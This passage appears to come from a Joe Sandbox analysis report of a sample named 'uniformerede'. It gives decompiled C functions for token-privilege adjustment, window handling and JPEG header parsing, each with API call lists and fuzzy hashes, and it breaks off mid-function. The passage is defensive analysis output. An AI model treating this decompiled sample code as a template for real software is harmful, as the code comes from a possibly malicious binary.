                                                                                                                                                                                                                            			E00475958(char __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				char _v9;
                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                            				long _v20;
                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                            				struct _TOKEN_PRIVILEGES _v36;
                                                                                                                                                                                                                            				struct _TOKEN_PRIVILEGES _v52;
                                                                                                                                                                                                                            				char _v56;
                                                                                                                                                                                                                            				intOrPtr* _t30;
                                                                                                                                                                                                                            				intOrPtr _t71;
                                                                                                                                                                                                                            				intOrPtr _t74;
                                                                                                                                                                                                                            				void* _t80;
                                                                                                                                                                                                                            				void* _t81;
                                                                                                                                                                                                                            				intOrPtr _t82;
                                                                                                                                                                                                                            				void* _t86;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t80 = _t81;
                                                                                                                                                                                                                            				_t82 = _t81 + 0xffffffcc;
                                                                                                                                                                                                                            				_v56 = 0;
                                                                                                                                                                                                                            				_v9 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				E00404E70(_v8);
                                                                                                                                                                                                                            				_push(_t80);
                                                                                                                                                                                                                            				_push(0x475a82);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t82;
                                                                                                                                                                                                                            				_t30 =  *0x49de34; // 0x49b0ec
                                                                                                                                                                                                                            				if( *_t30 != 2) {
                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                            					_pop(_t71);
                                                                                                                                                                                                                            					 *[fs:eax] = _t71;
                                                                                                                                                                                                                            					_push(0x475a89);
                                                                                                                                                                                                                            					E004049C0( &_v56);
                                                                                                                                                                                                                            					return E004049C0( &_v8);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) == 0) {
                                                                                                                                                                                                                            						if((0 | GetLastError() == 0x00000000) == 0) {
                                                                                                                                                                                                                            							E0040C918(GetLastError(),  &_v56);
                                                                                                                                                                                                                            							E0040D144(_v56, 1);
                                                                                                                                                                                                                            							E00404378();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_push(_t80);
                                                                                                                                                                                                                            						_push(0x475a2e);
                                                                                                                                                                                                                            						_push( *[fs:eax]);
                                                                                                                                                                                                                            						 *[fs:eax] = _t82;
                                                                                                                                                                                                                            						if(LookupPrivilegeValueA(0, E00404E80(_v8),  &(_v36.Privileges)) != 0) {
                                                                                                                                                                                                                            							_v36.PrivilegeCount = 1;
                                                                                                                                                                                                                            							_t86 = _v9 - 1;
                                                                                                                                                                                                                            							if(_t86 < 0) {
                                                                                                                                                                                                                            								_v24 = 0;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								if(_t86 == 0) {
                                                                                                                                                                                                                            									_v24 = 2;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_v20 = 0;
                                                                                                                                                                                                                            							asm("movsd");
                                                                                                                                                                                                                            							asm("movsd");
                                                                                                                                                                                                                            							asm("movsd");
                                                                                                                                                                                                                            							asm("movsd");
                                                                                                                                                                                                                            							AdjustTokenPrivileges(_v16, 0,  &_v36, 0x10,  &_v52,  &_v20);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_pop(_t74);
                                                                                                                                                                                                                            						 *[fs:eax] = _t74;
                                                                                                                                                                                                                            						_push(0x475a35);
                                                                                                                                                                                                                            						return CloseHandle(_v16);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,00000000,00475A82), ref: 00475998
                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000028,?,00000000,00475A82), ref: 0047599E
                                                                                                                                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 004759C8
                                                                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,?,?,00000000,00475A2E,?,00000000,00000028,?,00000000,00475A82), ref: 00475A12
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,00475A35,00000000,00000028,?,00000000,00475A82), ref: 00475A28
                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,00000028,?,00000000,00475A82), ref: 00475A35
                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,00000028,?,00000000,00475A82), ref: 00475A43
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLastProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1944759421-0
                                                                                                                                                                                                                            • Opcode ID: 5d0e082824e478a09f318278083c587987d0817199167bde93ddb0bc5826edd3
                                                                                                                                                                                                                            • Instruction ID: 3c61c7cdd0eda20fe66ef621c1da0ff4ff2913ef0bcb8c05ec3cca93a53440b9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d0e082824e478a09f318278083c587987d0817199167bde93ddb0bc5826edd3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2931B2B1904608AEDB01EBA5DD42AEF77BDEF45304F51453AF904FB280DBB86E048668
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 37%
                                                                                                                                                                                                                            			E0045A104(void* __eax) {
                                                                                                                                                                                                                            				struct HWND__* _t21;
                                                                                                                                                                                                                            				intOrPtr* _t26;
                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                            				intOrPtr* _t30;
                                                                                                                                                                                                                            				int _t33;
                                                                                                                                                                                                                            				intOrPtr _t36;
                                                                                                                                                                                                                            				void* _t51;
                                                                                                                                                                                                                            				int _t60;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t51 = __eax;
                                                                                                                                                                                                                            				_t21 = IsIconic( *(__eax + 0x30));
                                                                                                                                                                                                                            				if(_t21 != 0) {
                                                                                                                                                                                                                            					SetActiveWindow( *(_t51 + 0x30));
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t51 + 0x44)) == 0 ||  *((char*)(_t51 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t51 + 0x44)) + 0x57)) == 0) {
                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                            						E0045906C( *(_t51 + 0x30), 9, __eflags);
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t60 = IsWindowEnabled(E00441704( *((intOrPtr*)(_t51 + 0x44))));
                                                                                                                                                                                                                            						if(_t60 == 0) {
                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                            							_push(0xf120);
                                                                                                                                                                                                                            							_push(0x112);
                                                                                                                                                                                                                            							_push( *(_t51 + 0x30));
                                                                                                                                                                                                                            							L00407540();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t26 =  *0x49d970; // 0x49e900
                                                                                                                                                                                                                            					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
                                                                                                                                                                                                                            					if(_t60 < 0) {
                                                                                                                                                                                                                            						asm("adc eax, 0x0");
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t30 =  *0x49d970; // 0x49e900
                                                                                                                                                                                                                            					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1;
                                                                                                                                                                                                                            					if(_t60 < 0) {
                                                                                                                                                                                                                            						asm("adc eax, 0x0");
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					SetWindowPos( *(_t51 + 0x30), 0, _t33, ??, ??, ??, ??);
                                                                                                                                                                                                                            					_t36 =  *((intOrPtr*)(_t51 + 0x44));
                                                                                                                                                                                                                            					if(_t36 != 0 &&  *((char*)(_t36 + 0x22b)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) {
                                                                                                                                                                                                                            						E00454D78(_t36, 0);
                                                                                                                                                                                                                            						E00457194( *((intOrPtr*)(_t51 + 0x44)));
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E0045974C(_t51);
                                                                                                                                                                                                                            					_t21 =  *0x49ebbc; // 0x0
                                                                                                                                                                                                                            					_t55 =  *((intOrPtr*)(_t21 + 0x64));
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t21 + 0x64)) != 0) {
                                                                                                                                                                                                                            						_t21 = SetFocus(E00441704(_t55));
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if( *((short*)(_t51 + 0x122)) != 0) {
                                                                                                                                                                                                                            						return  *((intOrPtr*)(_t51 + 0x120))();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t21;
                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • IsIconic.USER32 ref: 0045A10C
                                                                                                                                                                                                                            • SetActiveWindow.USER32(?,?,?,?,00459B2D,00000000,00459FEE), ref: 0045A11D
                                                                                                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 0045A140
                                                                                                                                                                                                                            • NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,00459B2D,00000000,00459FEE), ref: 0045A159
                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,?,?,00459B2D,00000000,00459FEE), ref: 0045A19F
                                                                                                                                                                                                                            • SetFocus.USER32(00000000,?,00000000,00000000,?,?,00459B2D,00000000,00459FEE), ref: 0045A1E4
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$ActiveEnabledFocusIconicNtdllProc_
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3996302123-0
                                                                                                                                                                                                                            • Opcode ID: a04679a4ac2906456c8448a2d84214dddb4dc2f3039b57f19c98973d0d101b18
                                                                                                                                                                                                                            • Instruction ID: e53a9b633d1b0bd006f11759a665d113d80ac3550e73a578dd09315b07be2b8d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a04679a4ac2906456c8448a2d84214dddb4dc2f3039b57f19c98973d0d101b18
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B831DD71B006009BEB11EB69CD86B563798AB04709F0805AAFE04DF2D7D67DEC58C75A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                                                                            			E004410F0(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                            				struct _WINDOWPLACEMENT _v48;
                                                                                                                                                                                                                            				char _v64;
                                                                                                                                                                                                                            				void* _t31;
                                                                                                                                                                                                                            				int _t45;
                                                                                                                                                                                                                            				int _t51;
                                                                                                                                                                                                                            				void* _t52;
                                                                                                                                                                                                                            				int _t56;
                                                                                                                                                                                                                            				int _t58;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t56 = __ecx;
                                                                                                                                                                                                                            				_t58 = __edx;
                                                                                                                                                                                                                            				_t52 = __eax;
                                                                                                                                                                                                                            				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                            					if(E00441A08(_t52) == 0) {
                                                                                                                                                                                                                            						L7:
                                                                                                                                                                                                                            						 *(_t52 + 0x40) = _t58;
                                                                                                                                                                                                                            						 *(_t52 + 0x44) = _t56;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
                                                                                                                                                                                                                            						_t31 = E00441A08(_t52);
                                                                                                                                                                                                                            						__eflags = _t31;
                                                                                                                                                                                                                            						if(_t31 != 0) {
                                                                                                                                                                                                                            							_v48.length = 0x2c;
                                                                                                                                                                                                                            							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
                                                                                                                                                                                                                            							E0043A91C(_t52,  &_v64);
                                                                                                                                                                                                                            							asm("movsd");
                                                                                                                                                                                                                            							asm("movsd");
                                                                                                                                                                                                                            							asm("movsd");
                                                                                                                                                                                                                            							asm("movsd");
                                                                                                                                                                                                                            							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                            						E0043A5D0(_t52);
                                                                                                                                                                                                                            						return E00403DE8(_t52, _t66);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t45 = IsIconic( *(_t52 + 0x180));
                                                                                                                                                                                                                            					_t66 = _t45;
                                                                                                                                                                                                                            					if(_t45 != 0) {
                                                                                                                                                                                                                            						goto L7;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
                                                                                                                                                                                                                            					goto L9;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t51 = _a4;
                                                                                                                                                                                                                            					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
                                                                                                                                                                                                                            						return _t51;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L4;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • IsIconic.USER32 ref: 0044112F
                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 0044114D
                                                                                                                                                                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 00441183
                                                                                                                                                                                                                            • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 004411A7
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$Placement$Iconic
                                                                                                                                                                                                                            • String ID: ,
                                                                                                                                                                                                                            • API String ID: 568898626-3772416878
                                                                                                                                                                                                                            • Opcode ID: cbc295ee499962ac83a9ff01bfd7ce2be257ba844d1b33c8d8d56419791f1386
                                                                                                                                                                                                                            • Instruction ID: 973ca0ced29493b3e0d87defc8b2cb9363f4da81e4e6ee6b5ea2909c58c8dcf6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cbc295ee499962ac83a9ff01bfd7ce2be257ba844d1b33c8d8d56419791f1386
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA21B271A00108ABDF10EF69C8C19DA77A8AF4D354F00406AFE14EF352D779ED448B65
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                            			E0045A054(void* __eax) {
                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                            				struct HWND__* _t36;
                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t40 = __eax;
                                                                                                                                                                                                                            				_t1 = _t40 + 0x30; // 0x0
                                                                                                                                                                                                                            				_t21 = IsIconic( *_t1);
                                                                                                                                                                                                                            				if(_t21 == 0) {
                                                                                                                                                                                                                            					E0045973C();
                                                                                                                                                                                                                            					_t2 = _t40 + 0x30; // 0x0
                                                                                                                                                                                                                            					SetActiveWindow( *_t2);
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t40 + 0x44)) == 0 ||  *((char*)(_t40 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t40 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E00441704( *((intOrPtr*)(_t40 + 0x44)))) == 0) {
                                                                                                                                                                                                                            						_t15 = _t40 + 0x30; // 0x0
                                                                                                                                                                                                                            						_t21 = E0045906C( *_t15, 6, __eflags);
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t43 =  *((intOrPtr*)(_t40 + 0x44));
                                                                                                                                                                                                                            						_t36 = E00441704( *((intOrPtr*)(_t40 + 0x44)));
                                                                                                                                                                                                                            						_t13 = _t40 + 0x30; // 0x0
                                                                                                                                                                                                                            						SetWindowPos( *_t13, _t36,  *( *((intOrPtr*)(_t40 + 0x44)) + 0x40),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x44),  *(_t43 + 0x48), 0, 0x40);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_push(0xf020);
                                                                                                                                                                                                                            						_push(0x112);
                                                                                                                                                                                                                            						_t14 = _t40 + 0x30; // 0x0
                                                                                                                                                                                                                            						_t21 =  *_t14;
                                                                                                                                                                                                                            						_push(_t21);
                                                                                                                                                                                                                            						L00407540();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if( *((short*)(_t40 + 0x11a)) != 0) {
                                                                                                                                                                                                                            						return  *((intOrPtr*)(_t40 + 0x118))();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t21;
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            0x0045a0d5
                                                                                                                                                                                                                            0x0045a0d5
                                                                                                                                                                                                                            0x0045a0f1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045a0fb
                                                                                                                                                                                                                            0x0045a0f1
                                                                                                                                                                                                                            0x0045a103

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • IsIconic.USER32 ref: 0045A05C
                                                                                                                                                                                                                            • SetActiveWindow.USER32(00000000,00000000,?,?,0045A790), ref: 0045A074
                                                                                                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 0045A097
                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000,?,?,0045A790), ref: 0045A0C0
                                                                                                                                                                                                                            • NtdllDefWindowProc_A.USER32(00000000,00000112,0000F020,00000000,00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000), ref: 0045A0D5
Memory Dump Source
• Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$ActiveEnabledIconicNtdllProc_
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1720852555-0
                                                                                                                                                                                                                            • Opcode ID: 8ef17a5689defe69a59b169c72c27f81d88e002240e7c90d7581b2bd6a1a7dc2
                                                                                                                                                                                                                            • Instruction ID: fcf5efa9db48042d746d78bebf6e1cf2cc32c712e84d9ef6b3749e70c2da43cc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ef17a5689defe69a59b169c72c27f81d88e002240e7c90d7581b2bd6a1a7dc2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF110071650200EBDB54EE69C9C6B9637E8AF04715F0800AABF04DF2D7D679EC448759
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                            			E0042C6FC(void* __edi, struct HWND__* _a4, signed int _a8) {
                                                                                                                                                                                                                            				struct _WINDOWPLACEMENT _v48;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                            				intOrPtr _t21;
                                                                                                                                                                                                                            				struct HWND__* _t23;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t19 = _a8;
                                                                                                                                                                                                                            				_t23 = _a4;
                                                                                                                                                                                                                            				if( *0x49e929 != 0) {
                                                                                                                                                                                                                            					if((_t19 & 0x00000003) == 0) {
                                                                                                                                                                                                                            						if(IsIconic(_t23) == 0) {
                                                                                                                                                                                                                            							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							GetWindowPlacement(_t23,  &_v48);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						return E0042C66C( &(_v48.rcNormalPosition), _t19);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					return 0x12340042;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t21 =  *0x49e904; // 0x42c6fc
                                                                                                                                                                                                                            				 *0x49e904 = E0042C4FC(1, _t19, _t21, __edi, _t23);
                                                                                                                                                                                                                            				return  *0x49e904(_t23, _t19);
                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                            Strings
Memory Dump Source
• Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                                                                                            • String ID: MonitorFromWindow
                                                                                                                                                                                                                            • API String ID: 190572456-2842599566
                                                                                                                                                                                                                            • Opcode ID: 8d1f9452d8f12363e96bde9292e11cbfcc82fa1fc2827bfdbdac76f16a64d1e2
                                                                                                                                                                                                                            • Instruction ID: a470fbf3681d2cee79b4262df8cd97740cfa3d316a724833ce9ade3e4696291a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d1f9452d8f12363e96bde9292e11cbfcc82fa1fc2827bfdbdac76f16a64d1e2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1201ADB1A051296A8B00EB65ADC19BF735C9B84354B900037F810A3241D72CBE019BAE
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0046B1E4(intOrPtr* __eax, char* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				intOrPtr _t83;
                                                                                                                                                                                                                            				intOrPtr _t86;
                                                                                                                                                                                                                            				intOrPtr _t89;
                                                                                                                                                                                                                            				intOrPtr _t92;
                                                                                                                                                                                                                            				intOrPtr _t95;
                                                                                                                                                                                                                            				intOrPtr* _t106;
                                                                                                                                                                                                                            				intOrPtr _t115;
                                                                                                                                                                                                                            				intOrPtr _t118;
                                                                                                                                                                                                                            				intOrPtr _t121;
                                                                                                                                                                                                                            				char* _t124;
                                                                                                                                                                                                                            				intOrPtr _t125;
                                                                                                                                                                                                                            				void* _t151;
                                                                                                                                                                                                                            				void* _t153;
                                                                                                                                                                                                                            				intOrPtr _t180;
                                                                                                                                                                                                                            				intOrPtr _t181;
                                                                                                                                                                                                                            				intOrPtr* _t182;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v8 = _t125;
                                                                                                                                                                                                                            				_t124 = __edx;
                                                                                                                                                                                                                            				_t182 = __eax;
                                                                                                                                                                                                                            				_t180 = _v8 + _a4;
                                                                                                                                                                                                                            				if(_v8 < 0xe ||  *__edx != 0x4a ||  *((char*)(__edx + 1)) != 0x46 ||  *((char*)(__edx + 2)) != 0x49 ||  *((char*)(__edx + 3)) != 0x46 ||  *((char*)(__edx + 4)) != 0) {
                                                                                                                                                                                                                            					if(_v8 < 6 ||  *_t124 != 0x4a ||  *((char*)(_t124 + 1)) != 0x46 ||  *((char*)(_t124 + 2)) != 0x58 ||  *((char*)(_t124 + 3)) != 0x58 ||  *((char*)(_t124 + 4)) != 0) {
                                                                                                                                                                                                                            						_t83 =  *_t182;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t83 + 0x14)) = 0x4d;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t83 + 0x18)) = _t180;
                                                                                                                                                                                                                            						return  *((intOrPtr*)( *_t182 + 4))();
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t151 =  *((intOrPtr*)(_t124 + 5)) - 0x10;
                                                                                                                                                                                                                            						if(_t151 == 0) {
                                                                                                                                                                                                                            							_t86 =  *_t182;
                                                                                                                                                                                                                            							 *((intOrPtr*)(_t86 + 0x14)) = 0x6c;
                                                                                                                                                                                                                            							 *((intOrPtr*)(_t86 + 0x18)) = _t180;
                                                                                                                                                                                                                            							return  *((intOrPtr*)( *_t182 + 4))();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t153 = _t151 - 1;
                                                                                                                                                                                                                            						if(_t153 == 0) {
                                                                                                                                                                                                                            							_t89 =  *_t182;
                                                                                                                                                                                                                            							 *((intOrPtr*)(_t89 + 0x14)) = 0x6d;
                                                                                                                                                                                                                            							 *((intOrPtr*)(_t89 + 0x18)) = _t180;
                                                                                                                                                                                                                            							return  *((intOrPtr*)( *_t182 + 4))();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(_t153 == 2) {
                                                                                                                                                                                                                            							_t92 =  *_t182;
                                                                                                                                                                                                                            							 *((intOrPtr*)(_t92 + 0x14)) = 0x6e;
                                                                                                                                                                                                                            							 *((intOrPtr*)(_t92 + 0x18)) = _t180;
                                                                                                                                                                                                                            							return  *((intOrPtr*)( *_t182 + 4))();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t95 =  *_t182;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t95 + 0x14)) = 0x59;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t95 + 0x18)) = 0;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t95 + 0x1c)) = _t180;
                                                                                                                                                                                                                            						return  *((intOrPtr*)( *_t182 + 4))();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *((intOrPtr*)(__eax + 0x118)) = 1;
                                                                                                                                                                                                                            				 *((char*)(__eax + 0x11c)) =  *((intOrPtr*)(__edx + 5));
                                                                                                                                                                                                                            				 *((char*)(__eax + 0x11d)) =  *((intOrPtr*)(__edx + 6));
                                                                                                                                                                                                                            				 *((char*)(__eax + 0x11e)) =  *((intOrPtr*)(__edx + 7));
                                                                                                                                                                                                                            				 *((short*)(__eax + 0x120)) = (0 << 8) +  *((intOrPtr*)(__edx + 9));
                                                                                                                                                                                                                            				 *((short*)(__eax + 0x122)) = (0 << 8) +  *((intOrPtr*)(__edx + 0xb));
